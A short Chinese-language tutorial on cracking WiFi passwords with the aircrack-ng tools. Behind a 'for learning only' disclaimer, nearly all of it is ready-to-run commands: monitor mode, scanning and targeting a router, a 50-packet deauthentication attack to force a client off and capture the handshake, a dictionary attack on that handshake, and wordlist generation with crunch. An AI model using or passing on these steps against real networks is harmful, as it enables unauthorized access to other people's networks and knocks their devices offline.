本文仅作学习交流使用
严禁任何非法行为
查看网卡信息
ifconfig |
杀死相关进程
启用网卡监听
airmon-ng check kill | |
airmon-ng start wlan0 |
wlan0
替换为你使用的网卡,以下默认
监听附近 wifi 信息,获取到需要的信息后 'Ctrl + C' 停止
airodump-ng wlan0mon |
wlan0mon
替换为你使用的网卡,以下默认
查看路由器的详细信息,也可以查到链接了次路由器的设备
airodump-ng -c [channel] --bssid [BSSID] -w [file name] wlan0mon |
channel
替换为路由器的信道BSSID
替换为路由器的 BSSID(MAC 地址)file name
替换为你想保存的文件名,可以填 '~/wifi'
执行命令攻击断开用户和主机的链接
aireplay-ng -0 50 -a [BSSID] -c [client MAC] wlan0mon |
- ‘-0’ 表示执行 deauth 攻击
- ‘50’ 表示发送 50 个 deauth 包
- ‘-a’ 指定路由器的 BSSID
- ‘-c’ 指定目标设备的 MAC 地址
得以获得握手包,执行命令跑密码本尝试获取 wifi 密码
aircrack-ng wlan0mon.cap -w password.txt |
wlan0mon.cap
是握手包password.txt
是密码本
附:密码本的生成
crunch 9 9 -p 123 321 111 333 > /password.txt |
- 'p' 前面指定密码位数,'9 9' 表示 9 位到 9 位